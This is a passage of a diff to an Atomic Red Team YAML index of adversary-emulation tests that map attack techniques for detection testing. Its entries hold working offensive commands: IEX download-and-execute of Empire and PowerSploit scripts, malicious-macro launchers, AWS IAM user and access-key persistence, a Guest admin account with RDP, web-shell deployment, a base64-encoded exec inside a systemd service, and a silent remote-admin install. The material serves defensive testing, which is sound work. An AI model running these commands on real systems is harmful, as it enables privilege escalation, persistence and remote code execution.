+        from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+        \nExecutes the code specified within the .dotm template.\nRequires download
+        of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+        \ \nDefault docs file opens Calculator.exe when test sucessfully executed,
+        while AV turned off.\n"
       supported_platforms:
       - windows
       input_arguments:
-        docx file:
+        docx_file:
           description: Location of the test docx file on the local filesystem.
           type: Path
           default: PathToAtomicsFolder\T1221\src\Calculator.docx
-        dotm template:
-          description: Location of the test dotm template on the remote server.
-          type: Path
-          default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
       dependency_executor_name: powershell
       dependencies:
       - description: ''
         prereq_command: ''
         get_prereq_command: ''
       executor:
-        command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
+        command: 'start #{docx_file}
 
 '
         name: command_prompt
@@ -34801,8 +35174,9 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
         name: powershell
         elevation_required: true
     - name: "`SeDebugPrivilege` token duplication"
@@ -34813,8 +35187,9 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
   T1205:
@@ -36382,6 +36757,39 @@ persistence:
 
 '
         name: powershell
+    - name: AWS - Create a group and add a user to that group
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+      description: 'Adversaries create AWS group, add users to specific to that group
+        to elevate their privilieges to gain more accesss
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Name of the AWS group to create
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists, we can only add a user to a group
+          if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic test
+
+'
+      executor:
+        command: |
+          aws iam create-group --group-name #{username}
+          aws iam add-user-to-group --user-name #{username} --group-name #{username}
+        cleanup_command: |
+          aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+          aws iam delete-group --group-name #{username}
+        name: sh
   T1547.014:
     technique:
       external_references:
@@ -36635,7 +37043,42 @@ persistence:
       x_mitre_platforms:
       - IaaS
       - Azure AD
-    atomic_tests: []
+      identifier: T1098.001
+    atomic_tests:
+    - name: AWS - Create Access Key and Secret Key
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+      description: 'Adversaries create their own new access and secret keys to programatically
+        interact with AWS environment, which is already compromised
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Create new AWS access and secret keys for the user
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic
+
+'
+      executor:
+        command: |
+          aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+          cd $PathToAtomicsFolder/T1098.001/bin/
+          ./aws_secret.sh
+        cleanup_command: |
+          access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+          aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+          rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+        name: sh
   T1546.009:
     technique:
       external_references:
@@ -36802,7 +37245,8 @@ persistence:
         computer starts up various applications and may in fact drive you crazy. A
         reliable way to make the message box appear and verify the \nAppInit Dlls
         are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
       supported_platforms:
       - windows
       input_arguments:
@@ -37435,7 +37879,7 @@ persistence:
         command: |
           bitsadmin.exe /create #{bits_job_name}
           bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
           bitsadmin.exe /resume #{bits_job_name}
           timeout 5
           bitsadmin.exe /complete #{bits_job_name}
@@ -38205,7 +38649,43 @@ persistence:
       - Office 365
       - IaaS
       - Google Workspace
-    atomic_tests: []
+      identifier: T1136.003
+    atomic_tests:
+    - name: AWS - Create a new IAM user
+      auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+      description: 'Creates a new IAM user in AWS. Upon successful creation, a new
+        user will be created. Adversaries create new IAM users so that their malicious
+        activity do not interupt the normal functions of the compromised users and
+        can remain undetected for a long time
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Username of the IAM user to create in AWS
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+'
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+'
+      executor:
+        command: 'aws iam create-user --user-name #{username}
+
+'
+        cleanup_command: 'aws iam delete-user --user-name #{username}
+
+'
+        name: sh
+        elevation_required: false
   T1078.004:
     technique:
       id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
@@ -39064,9 +39544,9 @@ persistence:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -39078,6 +39558,10 @@ persistence:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -39090,8 +39574,9 @@ persistence:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1136.002:
@@ -41670,11 +42155,11 @@ persistence:
       - windows
       executor:
         command: |
-          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-          if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+          mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
           echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
         cleanup_command: |
-          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
           del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
         name: command_prompt
   T1137.001:
@@ -43942,7 +44427,8 @@ persistence:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -44860,6 +45346,48 @@ persistence:
           rm -rf #{systemd_service_path}/#{systemd_service_file}
           systemctl daemon-reload
         name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
   T1053.006:
     technique:
       id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -45699,15 +46227,16 @@ persistence:
         get_prereq_command: |
           New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
       executor:
-        command: 'xcopy #{web_shells} #{web_shell_path}
-
-'
-        cleanup_command: 'del #{web_shell_path} /q >nul 2>&1
+        command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
 
 '
+        cleanup_command: |
+          del #{web_shell_path}\b.jsp /q >nul 2>&1
+          del #{web_shell_path}\tests.jsp /q >nul 2>&1
+          del #{web_shell_path}\cmd.aspx /q >nul 2>&1
         name: command_prompt
   T1546.003:
     technique:
@@ -46877,6 +47406,21 @@ impact:
         cleanup_command: |
           $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
           rm #{encrypted_file_path}
+    - name: PureLocker Ransom Note
+      auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+      description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+        \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+
+'
+        cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+
+'
   T1565:
     technique:
       external_references:
@@ -49663,10 +50207,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-LocalAdminAccess -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
         name: powershell
     - name: Find local admins on all machines in domain (PowerView)
       auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -49678,10 +50221,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
         name: powershell
     - name: Find Local Admins via Group Policy (PowerView)
       auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
@@ -49697,9 +50239,9 @@ discovery:
           type: Path
           default: "$env:COMPUTERNAME"
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name}
-          -Verbose'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
         name: powershell
     - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
       auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -49759,10 +50301,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
 '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
@@ -50841,11 +51382,22 @@ discovery:
 '
       supported_platforms:
       - windows
-      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Endpoint must be joined to domain
 
 '
+        prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: '"Join system to domain"
+
+'
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
         name: powershell
   T1040:
     technique:
@@ -52337,7 +52889,7 @@ discovery:
         vbscript:
           description: Path to sample script
           type: String
-          default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+          default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
       executor:
         command: 'cscript #{vbscript}'
         name: powershell
@@ -52908,10 +53460,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
         name: powershell
   T1007:
     technique:
@@ -58178,7 +58729,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -58239,7 +58791,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         name: powershell
@@ -58277,7 +58830,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         name: powershell
@@ -58314,7 +58868,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
         name: powershell
@@ -58448,7 +59003,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
         name: powershell
     - name: Potentially Unwanted Applications (PUA)
@@ -59667,7 +60223,8 @@ execution:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -60076,7 +60633,41 @@ execution:
       x_mitre_remote_support: true
       x_mitre_contributors:
       - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
   T1153:
     technique:
       id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0
@@ -60546,7 +61137,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
         cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
           -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -60583,7 +61175,8 @@ execution:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
           -officeProduct \"Word\" -sub \"Extract\"\n"
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -62428,7 +63021,41 @@ lateral-movement:
       x_mitre_remote_support: true
       x_mitre_contributors:
       - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
   T1080:
     technique:
       id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
@@ -64253,6 +64880,55 @@ command-and-control:
           del #{local_path} >nul 2>&1
           del %temp%\MpCmdRun.log >nul 2>&1
         name: command_prompt
+    - name: whois file download
+      auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+      description: 'Download a remote file using the whois utility
+
+'
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: String
+          default: localhost
+        remote_port:
+          description: Remote port to connect to
+          type: Integer
+          default: 8443
+        output_file:
+          description: Path of file to save output to
+          type: Path
+          default: "/tmp/T1105.whois.out"
+        query:
+          description: Query to send to remote server
+          type: String
+          default: Hello from Atomic Red Team test T1105
+        timeout:
+          description: Timeout period before ending process (seconds)
+          type: Integer
+          default: 1
+      dependencies:
+      - description: 'The whois and timeout commands must be present
+
+'
+        prereq_command: 'which whois && which timeout
+
+'
+        get_prereq_command: 'echo "Please install timeout and the whois package"
+
+'
+      executor:
+        name: sh
+        elevation_required: false
+        command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
+          #{remote_port} "#{query}" > #{output_file}
+
+'
+        cleanup_command: 'rm -f #{output_file}
+
+'
   T1090.001:
     technique:
       external_references:
@@ -66948,9 +67624,9 @@ initial-access:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
